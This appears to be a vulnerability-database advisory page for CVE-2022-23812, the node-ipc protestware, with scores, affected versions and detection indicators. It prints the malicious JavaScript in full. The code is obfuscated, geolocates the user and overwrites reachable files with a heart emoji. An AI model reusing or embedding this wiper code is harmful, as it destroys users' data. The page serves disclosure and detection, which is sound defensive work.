cbcvebase.
CVE-2022-23812
published 2022-03-16

CVE-2022-23812: This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus…

PriorityP277critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWVulnCheck KEV
Exploited in the wild
EPSS
4.16%
89.6th percentile
This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from "path"; import a from "fs"; import o from "https"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from("aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=", "base64"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString("utf8"), function (t) { t.on("data", function (t) { const n = Buffer.from("Li8=", "base64"); const o = Buffer.from("Li4v", "base64"); const r = Buffer.from("Li4vLi4v", "base64"); const f = Buffer.from("Lw==", "base64"); const c = Buffer.from("Y291bnRyeV9uYW1l", "base64"); const e = Buffer.from("cnVzc2lh", "base64"); const i = Buffer.from("YmVsYXJ1cw==", "base64"); try { const s = JSON.parse(t.toString("utf8")); const u = s[c.toString("utf8")].toLowerCase(); const a = u.includes(e.toString("utf8")) || u.includes(i.toString("utf8")); // checks if country is Russia or Belarus if (a) { h(n.toString("utf8")); h(o.toString("utf8")); h(r.toString("utf8")); h(f.toString("utf8")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = "", o = "") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from("4p2k77iP", "base64"); for (var e = 0; e 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString("utf8"), function () {}); // overwrites file with ❤️ } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl }

Affected

5 ranges
VendorProductVersion rangeFixed in
node-ipc_projectnode-ipc>= 10.1.1 < unspecifiedunspecified
node-ipc_projectnode-ipc>= 10.1.1 < 10.1.310.1.3
node-ipc_projectnode-ipc>= 10.1.1 < 10.1.310.1.3
node-ipc_projectnode-ipc>= 11.0.0
node-ipc_projectnode-ipc>= unspecified < 10.1.310.1.3

Detection & IOCsextracted from sources · hover to see the quote

urlhttps://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154
domainapi.ipgeolocation.io
  • Detect outbound HTTPS GET requests to api.ipgeolocation.io with the specific API key ae511e1627824a968aaaa758a5309154 in the query string, originating from Node.js processes — this is the geolocation beacon used to determine if the victim is in Russia or Belarus before triggering the payload.
  • Alert on mass file overwrites where file contents are replaced with the heart emoji (❤️, UTF-8 bytes E2 9D A4 EF B8 8F). The malware recursively traverses ./, ../, ../../, and / and calls fs.writeFile on every reachable file.
  • Flag presence of node-ipc versions 10.1.1 or 10.1.2 in package-lock.json / node_modules, as these are the confirmed malicious versions removed from the NPM registry.
  • Detect base64-encoded strings 'Li8=', 'Li4v', 'Li4vLi4v', 'Lw==', 'Y291bnRyeV9uYW1l', 'cnVzc2lh', 'YmVsYXJ1cw==', '4p2k77iP' within JavaScript source files or evaluated strings — these are obfuscation markers unique to this malware.
  • From node-ipc version 11.0.0 onwards, the malicious behavior is delegated to the imported 'peacenotwar' package rather than being inline — audit dependency trees for peacenotwar as a transitive dependency.
  • The setTimeout delay is randomized (Math.ceil(Math.random() * 1e3) ms) and execution is probabilistic (only fires ~75% of the time via Math.round(Math.random()*4) > 1 check) — sandbox detonation may not trigger on first run; repeat execution is needed for reliable detection.
  • ·The geolocation API key (ae511e1627824a968aaaa758a5309154) is hardcoded in the malware. If the key is revoked or the endpoint changes, the geolocation check silently fails and no file destruction occurs — victims outside Russia/Belarus are unaffected by the destructive payload but the beacon call still fires.
  • ·Versions 10.1.1 and 10.1.2 were removed from the NPM registry; version 10.1.3 is the patched release. Environments with cached or vendored copies of 10.1.1/10.1.2 remain at risk even after registry removal.
  • ·The payload only triggers when the resolved country_name field (lowercased) contains 'russia' or 'belarus'. VPN or proxy usage by victims in those countries would bypass the geolocation check and prevent file destruction.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.